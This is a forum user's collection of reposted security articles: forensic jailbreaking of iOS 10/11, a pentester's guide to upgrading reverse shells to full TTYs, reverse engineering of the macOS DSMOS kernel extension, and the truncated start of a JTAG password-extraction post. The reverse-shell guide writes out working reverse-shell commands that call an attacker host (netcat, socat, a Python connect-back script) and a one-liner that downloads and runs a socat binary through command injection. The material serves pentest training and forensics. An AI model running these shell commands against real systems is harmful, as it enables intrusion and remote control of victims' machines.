Everything posted by Nytro
-
Jailbreaking iOS 11 And All Versions Of iOS 10

POSTED BY SCAR ⋅ MARCH 30, 2018
FILED UNDER COMPUTER FORENSICS, DFIR, DIGITAL FORENSICS, IOS FORENSICS, JAILBREAKING

by Oleg Afonin, Mobile Product Specialist at ElcomSoft

Jailbreaking iOS is becoming increasingly difficult, especially considering the amounts of money Apple and independent bug hunters are paying for discovered vulnerabilities that could lead to a working exploit. Late last year, a bug hunter at Google's Project Zero discovered one such vulnerability and developed and published an exploit that gave birth to a plethora of jailbreak tools for all versions of iOS 10 as well as iOS 11.0 through 11.1.2. The newly emerged jailbreaks all exploit the same vulnerability. Moreover, they all use the same off-the-shelf exploit to jailbreak the device. However, there are major differences between the newly emerged jailbreaks that are worth explaining.

Why Jailbreak?

Mobile forensic experts use jailbreaks for a different reason compared to enthusiast users. Jailbreaking, or obtaining root-level access to the file system, is a required prerequisite for most physical acquisition tasks, as it exposes the file system to forensic acquisition tools, helping circumvent iOS sandbox protection and access protected app data. Jailbreaking the device helps experts extract the largest amount of data from the device.

During jailbreaking, many software restrictions imposed by iOS are removed through the use of software exploits. Jailbreaking in general performs multiple tasks, such as escaping the sandbox and bypassing kernel patch protection. For the mobile forensic expert, jailbreaking permits root access to the file system and allows establishing SSH connectivity to the device. This, in turn, allows accessing and extracting data that would otherwise be guarded by the operating system.

In this article, we'll review the latest jailbreaks for iOS 10.0 through 10.3.3 and 11.0 through 11.1.2:

iOS 10.0-10.3.3 (32-bit): h3lix
iOS 10.0-10.3.3 (64-bit): doubleH3lix, Meridian
iOS 10.3.x (64-bit, A7-A9 only): g0blin
iOS 11.0-11.1.2: LiberIOS
iOS 11.0-11.1.2: Electra

Before we review the individual jailbreak tools, let us first see what they have in common.

What Is a Jailbreak?

Jailbreaking modern versions of iOS is an extremely complex process exploiting multiple vulnerabilities in various parts of the OS to defeat the system's security measures. In general terms, a jailbreak performs the following steps:

Sandbox Escape: during this step, the jailbreak tool utilizes an exploit allowing it to access components it does not have the permissions to.
Privilege Escalation: the jailbreak gains elevated privileges allowing it to access protected resources (e.g. mount the root file system, patch the kernel, inject code etc.)
KPP Bypass: disables or works around the code signing check, which allows modifications to the file system without making the device unbootable, causing a bootloop or random reboots.

While getting more complicated, modern jailbreak tools are safer to use. Starting with iOS 11, all jailbreaks utilize the same installation procedure. A failed jailbreak does not cause system instability, and does not require reinstalling iOS in order to perform another attempt.

General Implications of Jailbreaking

The main purpose of a jailbreak is circumventing iOS security measures. A jailbroken device becomes vulnerable to attacks and malicious code unimaginable on a non-jailbroken device.
Since a jailbreak allows installing unsigned code, a jailbroken iOS device starts behaving much like Android devices with the "Allow installation from unknown sources" option turned on. In addition, sideloaded apps on jailbroken devices may obtain full access to other apps' sandboxed space, thus accessing personal (and highly sensitive) information they were never meant to.

Forensic Implications of iOS 10 and 11 Jailbreaks

Jailbreak tools exploit vulnerabilities. They can be picky, only supporting certain combinations of software (version of iOS) and hardware, allowing or disallowing third-party software repositories (Cydia) and potentially having other limitations. Installing a jailbreak brings the following forensic consequences:

System and data partitions modified. A jailbreak unavoidably modifies both the system and user data partitions. These modifications must be properly documented in order to maintain admissibility of collected evidence.
Internet connection required. The jailbreak installation procedure (starting with iOS 10) requires a working Internet connection (to at least ppq.apple.com) from both the computer and the iOS device being jailbroken. If the iOS device has an outstanding remote wipe or iCloud lock request, it might be locked the instant the connection is established. Contacting Apple to ensure there are no such requests (as well as blocking subsequent requests) is a good idea.
No clean removal. At this time, it is not possible to perform a clean removal of the jailbreak. Modifications performed to the system partition are persistent; even a factory reset would not remove the jailbreak. While some jailbreak tools (e.g. Electra) claim to create an APFS snapshot to allow restoring the system to pre-jailbreak condition in the future, there are currently no tools available to perform such a restore.

Experts must carefully consider the above implications before attempting to jailbreak a device.

Installing a Jailbreak

All jailbreaks for iOS 10 and iOS 11 share a common installation procedure. Steps to jailbreak:

Back up data with iTunes or Elcomsoft iOS Forensic Toolkit (if the backup password is empty, specify and record a temporary password).
Obtain and install the jailbreak tool using the appropriate links. This includes two files: the jailbreak IPA file and Cydia Impactor, available at http://www.cydiaimpactor.com/. Cydia Impactor (developed by Saurik) is used to sign the IPA file so that the jailbreak tool can be executed on iOS devices. You will need to use valid Apple ID credentials for signing the IPA. We recommend using a newly created Apple ID for signing the certificate.
Connect the iOS device to the computer, trust the computer on the iOS device and launch Cydia Impactor.
Drag the jailbreak IPA onto the Cydia Impactor app. Provide the Apple ID and password when prompted. Click OK to allow Cydia Impactor to sign the IPA and upload it onto the iOS device. (A disposable Apple account is recommended; there is no need to use the same Apple ID as the main ID on the device.)
Cydia Impactor will sideload the IPA file onto the iOS device. If you attempt to launch the jailbreak IPA at this time, the attempt will fail, as the digital certificate for that app is not yet trusted. You will need to trust the certificate in order to be able to launch the jailbreak. To do that, on the iOS device, open Settings > General > Device Management. You will see a developer profile under the "Apple ID" heading.
Tap the profile to establish trust for this developer. (An Internet connection is required to verify the app developer's certificate when establishing trust.)
On the iOS device, find the jailbreak app and run it. Follow the on-screen instructions. After you jailbreak, the device will respring.

Note that not every jailbreak installs the Cydia app; however, the jailbreak may already include a working SSH daemon (make sure to specify the correct port number in iOS Forensic Toolkit, which can be 22 or 2222). If the built-in SSH daemon does not work on either port number, download and install OpenSSH from Cydia. A working SSH connection is required to perform physical acquisition.
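To quickly check which port the SSH daemon answers on, a few lines of Python are enough (a sketch; DEVICE_IP is a placeholder for whatever address the device is reachable at — an SSH server identifies itself with an "SSH-..." banner as soon as you connect):

import socket

DEVICE_IP = "192.168.1.50"  # placeholder: address of the jailbroken device

for port in (22, 2222):
    try:
        with socket.create_connection((DEVICE_IP, port), timeout=5) as s:
            banner = s.recv(64).decode(errors="replace").strip()
            print(f"port {port}: {banner}")   # e.g. "SSH-2.0-OpenSSH_..."
    except OSError as e:
        print(f"port {port}: no SSH daemon ({e})")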
iOS 11 Jailbreaks

There are two jailbreaks supporting physical acquisition with iOS Forensic Toolkit that are compatible with iOS 11.0 through 11.1.2. The LiberIOS and Electra jailbreaks are based on the exploit discovered by Google Project Zero. Both jailbreaks are compatible with iOS Forensic Toolkit. If one of the two jailbreaks does not work for a particular combination of hardware and iOS version, you may try rebooting the device and applying the other jailbreak.

LiberIOS: http://newosxbook.com/liberios/
Electra: https://coolstar.org/electra/

At this time, only the Electra jailbreak supports Cydia; LiberIOS does not. The latest build of Electra ships Cydia with a Dropbear SSH daemon running on port 22.

Both jailbreaks employ a so-called 'KPP-less' approach to jailbreaking. In this approach, the jailbreak does not patch or otherwise alter the state of Apple's Kernel Patch Protection (KPP) service, which checks file system integrity during boot and then periodically while the system is running. All previous jailbreaks used to patch KPP (a so-called 'KPP bypass' approach). More information about KPP and how it was patched in earlier jailbreaks is available in How Kernel Patch Protection Works and How Hackers Bypass KPP. LiberIOS and Electra employ a different approach, leaving KPP alone and writing into different areas of the file system instead. While this approach leads to a potentially more stable jailbreak, it also limits the ability to run Cydia Substrate, requiring its complete rework. At this time, only the Electra jailbreak managed to include a working copy of Cydia in iOS 11.

In addition, the Electra jailbreak will create an APFS snapshot immediately after jailbreaking. The APFS snapshot can be best described as a file system-level restore point allowing you to roll back the root file system to exactly the state it was in immediately after jailbreaking. By performing a factory reset afterwards, you will get a clean system without any traces of jailbreaking. Do note, however, that using the APFS snapshot to roll back the device requires a not yet released tool called SemiRestore11.

According to the Electra jailbreak developer, this is how it works:

Prior to jailbreaking, Electra RC 3.x/final release will check if your device is in a somewhat clean state
If it is not in a somewhat clean state, it'll give you a warning message and ask if you want to continue jailbreaking anyways
However, if it is in a clean state, it will take an APFS snapshot of the root filesystem (/)
Later on, if you would like to utilize SemiRestore, it will tell APFS to revert to the snapshot that Electra created when the device was first jailbroken
After the APFS snapshot of the rootfs is reverted, you can "Reset all Contents and Settings" (which will wipe /var) and you will have a stock iPhone on iOS 11.0 – 11.1.2!

Both the LiberIOS and Electra jailbreaks are semi-tethered. If you reboot the device, you will have to re-run the jailbreak app to activate the jailbreak. The jailbreak will expire after 7 days, after which you will have to re-run the entire procedure, starting with using Cydia Impactor on your computer.

iOS 10 Jailbreaks

There are several iOS 10 jailbreaks based on the same vulnerability as the jailbreaks for iOS 11.

The h3lix (https://h3lix.tihmstar.net/) jailbreak supports all 32-bit devices that are running any iOS version between 10.0 and 10.3.3. h3lix is the only 32-bit jailbreak covering all versions of iOS 10 that is supported by iOS Forensic Toolkit.

The same developer released a version of the h3lix jailbreak for 64-bit devices running all versions of iOS 10.0 through 10.3.3. The doubleH3lix (https://doubleh3lix.tihmstar.net/) jailbreak includes the Cydia repository, but comes without a built-in SSH daemon. Installing OpenSSH from the Cydia store is obligatory to perform physical acquisition. In our tests, we discovered that OpenSSH may not work immediately after the installation, requiring a phone reboot. After rebooting the phone, one must wait 3 to 5 minutes before re-applying the jailbreak; otherwise, the jailbreak may fail with a "Kernel exploit failed" error followed by another reboot.

The Meridian (https://meridian.sparkes.zone/) jailbreak supports all 64-bit devices that are running any iOS version between 10.0 and 10.3.3. Notably, the iPhone 8, 8 Plus and iPhone X are missing from the list of supported devices, as they were released with iOS 11 out of the box. Meridian is a KPP-less jailbreak. KPP-less is a new style of jailbreaking which avoids writing to certain protected areas of the kernel; this may cause issues with Cydia Substrate.

g0blin (https://g0blin.sticktron.net/) is a specific jailbreak that targets a limited set of iOS versions running on certain hardware. Specifically, the g0blin jailbreak targets iOS 10.3 through 10.3.3 running on devices equipped with A7 through A9 chipsets. This includes the iPad 5, iPad Air and Air 2, iPad Pro (2015), iPad mini 2 through 4, iPod Touch 6, as well as the iPhone 5s, 6/Plus, SE and 6s/Plus. The reason for choosing this specific jailbreak would be compatibility. The g0blin jailbreak supports Cydia; the RC1 version of this tool includes the dropbear SSH daemon (RC2 drops dropbear support, making you install OpenSSH instead from the pre-installed Cydia app). For this reason, consider using either g0blin_rc2.ipa or the older g0blin_rc1.ipa depending on your requirements. RC2 supports a larger (yet unspecified) set of iOS/hardware combinations, while RC1 includes dropbear SSH without the need to launch Cydia to manually install OpenSSH.

What Next?

Installing a jailbreak is a required prerequisite for physical extraction.
The process of physical extraction is described in Breaking into iOS 11. An alternative to physical extraction is logical acquisition, which can be performed even on a locked device if a lockdown file (iTunes pairing record) is available. However, using existing pairing records becomes more complicated as iOS 11.3 limits the lifespan of lockdown records.

Conclusion

We described the differences between the jailbreaks utilizing the newly discovered vulnerability published by Google Project Zero, and covered the steps to install and (for the iOS 11 Electra jailbreak) uninstall the jailbreaks.

Founded in 1990, ElcomSoft Co. Ltd. is a leading developer of digital forensics tools. The company offers state-of-the-art solutions for businesses, forensic and law enforcement specialists, and provides training and consulting services on mobile and computer forensics.

Source: https://articles.forensicfocus.com/2018/03/30/jailbreaking-ios-11-and-all-versions-of-ios-10/
-
Upgrading simple shells to fully interactive TTYs

10 JULY 2017

Table of Contents
Generating reverse shell commands
Method 1: Python pty module
Method 2: Using socat
Method 3: Upgrading from netcat with magic
tl;dr cheatsheet

Every pentester knows that amazing feeling when they catch a reverse shell with netcat and see that oh-so-satisfying verbose netcat message followed by output from id. And if other pentesters are like me, they also know that dreadful feeling when their shell is lost because they run a bad command that hangs and accidentally hit "Ctrl-C" thinking it will stop it, but it instead kills the entire connection.

Besides not correctly handling SIGINT, these "dumb" shells have other shortcomings as well:

Some commands, like su and ssh, require a proper terminal to run
STDERR usually isn't displayed
Can't properly use text editors like vim
No tab-complete
No up arrow history
No job control
Etc...

Long story short, while these shells are great to catch, I'd much rather operate in a fully interactive TTY. I've come across some good resources that include very helpful tips and techniques for "upgrading" these shells, and wanted to compile and share them in a post. Along with Pentest Monkey, I also learned the techniques from Phineas Fisher in his released videos and writeups of his illegal activities:

Pentest Monkey - Post Exploitation Without a TTY
Phineas Fisher Hacks Catalan Police Union Website
Phineas Fisher - Hackingteam Writeup

For reference, in all the screenshots and commands to follow, I am injecting commands into a vulnerable web server ("VICTIM") and catching shells from my Kali VM ("KALI"):

VICTIM IP: 10.0.3.7
KALI IP: 10.0.3.4

Generating reverse shell commands

Everyone is pretty familiar with the traditional way of using netcat to get a reverse shell:

nc -e /bin/sh 10.0.3.4 4444

and catching it with:

nc -lvp 4444

The problem is not every server has netcat installed, and not every version of netcat has the -e option. Pentest Monkey has a great cheatsheet outlining a few different methods, but my favorite technique is to use Metasploit's msfvenom to generate the one-liner commands for me. Metasploit has several payloads under "cmd/unix" that can be used to generate one-liner bind or reverse shells. Any of these payloads can be used with msfvenom to spit out the raw command needed (specifying LHOST, LPORT or RPORT); the original post shows screenshots of a netcat command not requiring the -e flag and of a Perl one-liner for when netcat isn't installed. These can all be caught by using netcat and listening on the port specified (4444).
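As a hedged illustration (the screenshots aren't reproduced here, so the exact commands may differ from the original post), asking msfvenom for the Python flavor of such a payload looks like this:

msfvenom -p cmd/unix/reverse_python LHOST=10.0.3.4 LPORT=4444

The one-liner it emits is an obfuscated equivalent of the following Python, which connects back to KALI, wires the socket to stdin/stdout/stderr, and hands over a (still dumb) shell:

import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.3.4", 4444))        # KALI listener (nc -lvp 4444)
os.dup2(s.fileno(), 0)               # stdin  <- socket
os.dup2(s.fileno(), 1)               # stdout -> socket
os.dup2(s.fileno(), 2)               # stderr -> socket
subprocess.call(["/bin/sh", "-i"])   # interactive flag, but still no real TTY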
Method 1: Python pty module

One of my go-to commands for a long time after catching a dumb shell was to use Python to spawn a pty. The pty module lets you spawn a pseudo-terminal that can fool commands like su into thinking they are being executed in a proper terminal. To upgrade a dumb shell, simply run the following command:

python -c 'import pty; pty.spawn("/bin/bash")'

This will let you run su, for example (in addition to giving you a nicer prompt). Unfortunately, this doesn't get around some of the other issues outlined above. SIGINT (Ctrl-C) will still close netcat, and there's no tab-completion or history. But it's a quick and dirty workaround that has helped me numerous times.

Method 2: Using socat

socat is like netcat on steroids and is a very powerful networking swiss-army knife. socat can be used to pass full TTYs over TCP connections. If socat is installed on the victim server, you can launch a reverse shell with it. You must catch the connection with socat as well to get the full functionality. The following commands will yield a fully interactive TTY reverse shell:

On Kali (listen):

socat file:`tty`,raw,echo=0 tcp-listen:4444

On Victim (launch):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

If socat isn't installed, you're not out of luck. There are standalone binaries that can be downloaded from this awesome Github repo: https://github.com/andrew-d/static-binaries

With a command injection vuln, it's possible to download the correct architecture socat binary to a writable directory, chmod it, then execute a reverse shell in one line:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

On Kali, you'll catch a fully interactive TTY session. It supports tab-completion, SIGINT/SIGTSTP support, vim, up arrow history, etc. It's a full terminal. Pretty sweet.

Method 3: Upgrading from netcat with magic

I watched Phineas Fisher use this technique in his hacking video, and it feels like magic. Basically it is possible to use a dumb netcat shell to upgrade to a full TTY by setting some stty options within your Kali terminal.

First, follow the same technique as in Method 1 and use Python to spawn a PTY. Once bash is running in the PTY, background the shell with Ctrl-Z.

While the shell is in the background, now examine the current terminal and STTY info so we can force the connected shell to match it. The information needed is the TERM type ("xterm-256color") and the size of the current TTY ("rows 38; columns 116").

With the shell still backgrounded, now set the current STTY to type raw and tell it to echo the input characters with the following command:

stty raw -echo

With a raw stty, input/output will look weird and you won't see the next commands, but as you type they are being processed. Next foreground the shell with fg. It will re-open the reverse shell but formatting will be off. Finally, reinitialize the terminal with reset.

Note: I did not type the nc command again (as it might look above). I actually entered fg, but it was not echoed. The nc command is the job that is now in the foreground. The reset command was then entered into the netcat shell.

After the reset the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (from the info gathered above):

$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows 38 columns 116

The end result is a fully interactive TTY with all the features we'd expect (tab-complete, history, job control, etc), all over a netcat connection. The possibilities are endless now. Tmux over a netcat shell?? Why not?

tl;dr cheatsheet

Cheatsheet commands:

Using Python for a pseudo-terminal:

python -c 'import pty; pty.spawn("/bin/bash")'

Using socat:

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Using stty options:

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

Any other cool techniques? Let me know in the comments or hit me up on twitter. Enjoy!

-ropnop

Source: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
-
Reversing a macOS Kernel Extension
Nytro posted a topic in Reverse engineering & exploit development
Reversing a macOS Kernel Extension

Oct 11, 2016 · #kernel, #macOS, #lldb, #IDA

In my last post I covered the basics of kernel debugging in macOS. In this post we will put some of that to use and work through the process of reversing a macOS kernel module. As I said in my last post, in macOS there is a kernel module named "Don't Steal Mac OS X" (DSMOS) which registers a function with the Mach-O loader to unpack binaries that have the SG_PROTECTED_VERSION_1 flag set on their __TEXT segment. Finder, Dock, and loginwindow are a few examples of binaries that have this flag set.

My goal for this post is to simply work through the kernel module with the intent of discovering its functionality and use it as an opportunity to learn a bit about kernel debugging. If you'd like to follow along, I pulled the DSMOS module off of a laptop running macOS Sierra Beta (16A286a). Based on cursory looks at a couple copies from different versions of macOS it hasn't changed much recently, so you should be able to follow along with a copy from Mac OS X 10.11 or macOS Sierra. As you'll see in the screenshots, I used IDA Pro for this reversing; however, using a program like Hopper would be fine as well.

First Look

At a glance, the DSMOS kernel module is fairly simple in terms of number of functions. It has 25 functions, of which we only really care about a handful. Most of the functions we don't care about are constructors or destructors. Admittedly, I haven't taken the time to understand constructors and destructors used by a kernel module, so I will be skipping them in this post.

Typically when I first look at a binary I start by looking at the strings in the binary.

Figure 1: Strings in DSMOS kernel module

As seen in Figure 1, there really aren't that many strings and they aren't all that exciting. The most interesting is probably the string "AppleSMC", which is an indicator that this module interacts with the System Management Controller. Given that there are so few functions in this binary, my approach was to simply go through each of them, have a quick look at the control flow graph (CFG) for a rough estimate of complexity, and put the function either on the "care" or "don't care" list. Doing this I ended up with 9 functions of interest (see Table 1).

Address   Name
00000A9E  sub_A9E
00000B2A  sub_B2A
00000D30  sub_D30
00000E9E  sub_E9E
0000125A  sub_125A
00001616  sub_1616
00001734  sub_1734
00001C48  sub_1C48
00001C94  sub_1C94

Table 1: Potentially interesting function addresses and associated names.

With these functions as starting points, the next step is to start working through them. At this point our goal is to identify what functionality each provides.

Registering an IOService Notification Handler

Figure 2: Main block of code in sub_A9E

The relevant block of code from sub_A9E is shown in Figure 2. In words, this function first retrieves a matching dictionary for the AppleSMC service, then installs a notification handler that is called when IOKit detects a service with the class name AppleSMC has been registered. In the call to IOService::addNotification() shown in Figure 2, the first argument is the address of the handler to be called. This handler is labelled as notificationHandler in Figure 2 and not listed in Table 1 (it was a false negative); it is located at address 00000B1A with a default name in IDA of sub_B1A. sub_B1A isn't all that interesting; all it does is wrap sub_B2A, dropping some arguments in the process.

The Notification Handler

When an IOService registers the AppleSMC class, the code in sub_B2A will be notified.
This function begins by calling OSMetaClassBase::safeMetaCast() to cast the incoming service into an AppleSMC service. Note that Apple's documentation states that developers should not call OSMetaClassBase methods directly and should instead use the provided macros. In this case, the call to safeMetaCast() was likely generated by using the OSDynamicCast macro, which Apple lists as a valid macro to be used by developers. The next block in sub_B2A, shown in Figure 3, is where things actually start.

Figure 3: Querying SMC for key

Since C++ is horribly annoying to reverse due to all the indirect calls, rather than figuring out what method is represented by rax+850h I turned to Google. Searching for OSK0 and OSK1 turns up an article posted by Amit Singh. In it he talks briefly about an older version of the DSMOS kernel extension and also provides code that uses the OSK0 and OSK1 strings to query the SMC for two keys. Once these keys have been acquired, the kernel extension then computes a SHA-256 hash and compares it to a value stored in memory. If this comparison fails, an error is printed (not shown). If the hashes match then we skip to the block shown in Figure 4.

Figure 4: Installing DSMOS hook

The first part of this basic block takes the address of byte_3AA4 and our keys returned from the SMC, then calls sub_1616. If you look at sub_1616 you'll see it contains a couple loops and a bunch of byte manipulation I didn't want to reverse. Looking at where byte_3AA4 is used, you'll see it is used in two places: here in sub_B2A and in sub_D30. Let's wait a bit to see how it is used before figuring out how it is generated.

After the call to sub_1616 we have two AES decryption keys set. The first key is the value returned from the SMC when queried with OSK0 and the second key is the value returned when OSK1 is used to query the SMC. Finally, we see a global variable named initialized set to 1 and a call to dsmos_page_transform_hook with the address of sub_D30 as a parameter.

void dsmos_page_transform_hook(dsmos_page_transform_hook_t hook)
{
    printf("DSMOS has arrived\n");
    /* set the hook now - new callers will run with it */
    dsmos_hook = hook;
}

Listing 1: Source code for dsmos_page_transform_hook from the XNU source

Searching for dsmos_page_transform_hook in the XNU source we find the code in Listing 1. This is a pretty simple function that simply sets the value of dsmos_hook to the provided function address.

Usage of dsmos_hook in XNU

At this point we will step briefly away from IDA and the kernel extension, turning our attention to the XNU source. For this work I used the source of XNU 3248.60.10, which is the version used by Mac OS X 10.11.6. If you haven't done so already, you can download the source from http://opensource.apple.com/release/os-x-10116/.

As we saw, dsmos_page_transform_hook simply sets the value of dsmos_hook. Continuing from here we find that dsmos_hook is only used in dsmos_page_transform_hook, as we saw, and in dsmos_page_transform (Listing 2).

int dsmos_page_transform(const void* from, void *to, unsigned long long src_offset, void *ops)
{
    static boolean_t first_wait = TRUE;

    if (dsmos_hook == NULL) {
        if (first_wait) {
            first_wait = FALSE;
            printf("Waiting for DSMOS...\n");
        }
        return KERN_ABORTED;
    }
    return (*dsmos_hook) (from, to, src_offset, ops);
}

Listing 2: Usage of dsmos_hook by XNU

After ensuring dsmos_hook is set, the code in Listing 2 just calls the hook with the parameters passed to dsmos_page_transform. This approach allows Apple some flexibility and opens up the opportunity to have multiple hooks in the future.
Once again searching the XNU source, we see that the only use of dsmos_page_transform is in a function called unprotect_dsmos_segment. I have not included the source of unprotect_dsmos_segment since it is a bit longer and also not very exciting. The most interesting part about it is that it checks to see that the segment is long enough before attempting to call dsmos_page_transform on it. Continuing along, unprotect_dsmos_segment is only called by load_segment. load_segment is a much larger function and is not shown in its entirety, but the relevant portion is shown in Listing 3.

if (scp->flags & SG_PROTECTED_VERSION_1) {
    ret = unprotect_dsmos_segment(file_start,
                                  file_end - file_start,
                                  vp,
                                  pager_offset,
                                  map,
                                  vm_start,
                                  vm_end - vm_start);
    if (ret != LOAD_SUCCESS) {
        return ret;
    }
}

Listing 3: Call to unprotect_dsmos_segment from load_segment

The interesting part of the code in Listing 3 is that unprotect_dsmos_segment is only called on segments with the SG_PROTECTED_VERSION_1 flag set. As mentioned earlier, macOS only includes a few binaries with this flag set, such as Finder, Dock, and loginwindow.

The Hook Implementation

At this point we know that the DSMOS kernel extension queries the SMC for a pair of keys, initializes some AES decryption contexts and global variables, then installs a hook by calling dsmos_page_transform_hook. We also know that the Mach-O loader in the kernel will call this hook when it finds a segment with the SG_PROTECTED_VERSION_1 flag set. The next question then is: what does the hook installed by the DSMOS kernel extension actually do?

Figure 5: Main functionality of hook function

Prior to the code shown in Figure 5 is the function prologue and setting of a stack cookie; after the code is the checking of the stack cookie and function epilogue. The code shown starts by checking to see if the initialization flag is set. This is the same initialization flag we saw being set in sub_B2A (see Figure 4). If this flag is not set the function exits; otherwise, it enters a series of checks to identify which kernel is calling the hook. Searching the XNU source you can find the constant 0x2e69cf40 in the implementation of unprotect_dsmos_segment, as shown in Listing 4.

struct pager_crypt_info crypt_info;
crypt_info.page_decrypt = dsmos_page_transform;
crypt_info.crypt_ops = NULL;
crypt_info.crypt_end = NULL;
#pragma unused(vp, macho_offset)
crypt_info.crypt_ops = (void *)0x2e69cf40;
vm_map_offset_t crypto_backing_offset;
crypto_backing_offset = -1; /* i.e. use map entry's offset */

Listing 4: XNU setting value of crypt_info.crypt_ops

As Figure 5 shows, there are three basic cases implemented in the hook: no protection, an old kernel, and a new kernel. The basic block responsible for each case is labelled accordingly. I did not try to figure out which kernels mapped to which version; however, if you read the article by Amit Singh you'll notice that he talks about the method where each half of the page is encrypted with one of the SMC keys. In our kernel extension this corresponds to the old_kernel basic block.

The method currently in use by Apple starts at the basic block labelled as new_kernel in Figure 5. In it we see an 8 byte buffer is zeroed, then a call is made to a function I've called unprotect (named sub_1734 by IDA originally).
Looking at the parameters to unprotect, we see it takes the global buffer byte_3AA4 we saw earlier, the source buffer containing the page to be transformed, and the destination buffer to store the transformed page in, among other parameters. This is the point in our reversing where things become very tedious, since Apple has moved away from using AES to encrypt the pages to a custom method composed of many byte operations (e.g. shift left/right, logical/exclusive or).

Unprotecting a Protected Page

To properly set expectations: due to the tedious nature of this protection mechanism, and me being somewhat satisfied with what I've learned so far, I did not go through the full exercise of reversing Apple's "unprotect" method. Originally I had intended to write a program that would be able to apply the transform to a given binary, but that program is only partially completed and does not work. So, with expectations set sufficiently low, let's get a feel for the implementation and a couple ways of approaching it.

First let's step back briefly. Remember we saw the global variable byte_3AA4 being initialized in sub_B2A, and that I had said the code for that was also incredibly tedious? Well, thanks to the ability to dump memory from the kernel through the debugger, we don't need to reverse it at all. We just need to connect to a running kernel and ask it politely.

Dumping byte_3AA4 From a Running Kernel

If you are unclear about how to use the kernel debugger then check out my previous post. To get started, on your remote machine start the debugger by hitting the NMI keys (left command, right command, and power together), then connect to the debugger from your local machine. The following lldb session shows the steps all put together.

(lldb) kdp-remote 192.168.42.101
Version: Darwin Kernel Version 16.0.0: Fri Aug 5 19:25:15 PDT 2016; root:xnu-3789.1.24~6/DEVELOPMENT_X86_64; UUID=4F6F13D1-366B-3A79-AE9C-44484E7FAB18; stext=0xffffff802b000000
Kernel UUID: 4F6F13D1-366B-3A79-AE9C-44484E7FAB18
Load Address: 0xffffff802b000000
...
Process 1 stopped
* thread #2: tid = 0x00b8, 0xffffff802b39a3de kernel.development`Debugger [inlined] hw_atomic_sub(delt=1) at locks.c:1513, name = '0xffffff8037046ee0', queue = '0x0', stop reason = signal SIGSTOP
    frame #0: 0xffffff802b39a3de kernel.development`Debugger [inlined] hw_atomic_sub(delt=1) at locks.c:1513 [opt]
(lldb) showallkexts
OverflowError: long too big to convert
UUID                                 kmod_info          address            size   id  refs TEXT exec         size   version name
...
B97F871A-44FD-3EA4-BC46-8FD682118C79 0xffffff7fadf449a0 0xffffff7fadf41000 0x5000 130 0    0xffffff7fadf41000 0x5000 7.0.0   com.apple.Dont_Steal_Mac_OS_X
...
(lldb) memory read --force --binary --outfile byte_3AA4.bin 0xffffff7fadf44aa4 0xffffff7fadf44aa4+4172
4172 bytes written to '/Users/dean/Sites/lightbulbone.github.io/byte_3AA4.bin'

We start out by connecting to the remote host using the kdp-remote command. Once everything has loaded, we can get the address of the DSMOS kernel extension in memory using the showallkexts command. In my case the base address is 0xffffff7fadf41000. We then read the memory at address 0xffffff7fadf44aa4, which is the extension base address plus the offset of 0x3aa4; we read 4172 bytes since that is the size of the buffer. If you were writing a program to unprotect binaries you could use this extracted binary blob rather than trying to reverse the initialization algorithm.
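As a minimal sketch of that idea (everything here except the blob itself is hypothetical: unprotect_page stands in for a reimplementation of sub_1734, which was never finished), the dumped table could simply be loaded from disk and fed to the transform page by page:

# Load the 4172-byte table dumped from the running kernel instead of
# reimplementing the initialization routine (sub_1616) that generates it.
with open("byte_3AA4.bin", "rb") as f:
    table = f.read()
assert len(table) == 4172

PAGE_SIZE = 4096

def unprotect_page(table: bytes, page: bytes) -> bytes:
    """Hypothetical port of sub_1734: the shifts/ors/xors would have to
    be reversed out of the kernel extension to fill this in."""
    raise NotImplementedError

# protected_text.bin is a placeholder input: a dumped protected __TEXT segment.
with open("protected_text.bin", "rb") as f:
    blob = f.read()
clear = b"".join(unprotect_page(table, blob[i:i + PAGE_SIZE])
                 for i in range(0, len(blob), PAGE_SIZE))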
Emulating the Unprotect Algorithm

Due to the tedious nature of the algorithm used to "unprotect" a page, I decided to try using the Unicorn Engine to emulate it. This effort largely failed because it meant I would have to set up memory in Unicorn the same way as it is in the kernel extension and, as I said, the motivation wasn't quite there. As far as I know this is possible; however, it too can be rather tedious, especially in cases where the algorithm isn't as self-contained as in this case. Using an IDA plugin such as sk3wldbg may help; however, I was not aware of it at the time.

Reversing the Unprotect Algorithm

In the end I just sat down and started working through the algorithm in IDA. I did begin to write a program to unprotect before my motivation to work through the tedious code fell through the floor. For me, looking at DSMOS was an opportunity to learn about a kernel module I've known about for many years and become more familiar with the macOS kernel. That being said, a few things are worth pointing out.

Figure 6: Loop found in sub_1734

In Figure 6 a portion of sub_1734 is shown. In it we see the first eight bytes of the from pointer (stored in r14) being used to build a value to pass to sub_125A.

Figure 7: Unrolled loop in sub_125A

And, in Figure 7 we see part of sub_125A. In this part we see the first two iterations of an unrolled loop. The point of Figures 6 and 7 is to show some common constructs that come up when reversing code. If you're not familiar with these constructs it may help to write some code yourself and then analyze the binary after compilation.

Summary

The intent of this post was to reverse engineer the DSMOS kernel extension in macOS. The goal was to understand what functionality the DSMOS extension provided to the kernel and to become more familiar with the XNU kernel. We also touched on IOKit briefly, as well as a possible application of the Unicorn engine. If you have any questions or comments, please feel free to reach out to me on Twitter @lightbulbone.

Source: https://lightbulbone.com/posts/2016/10/dsmos-kext/

-
JTAG on-chip debugging: Extracting passwords from memory

Published 29/03/2018 | By ISA

Following on from my colleague's post on using UART to root a phone, I look at another of our challenges, whereby sensitive information such as passwords can be extracted from a device's memory if physical access to the device is acquired.

The goal and target

[Image: BroadLink RM Pro Smart Remote Control]

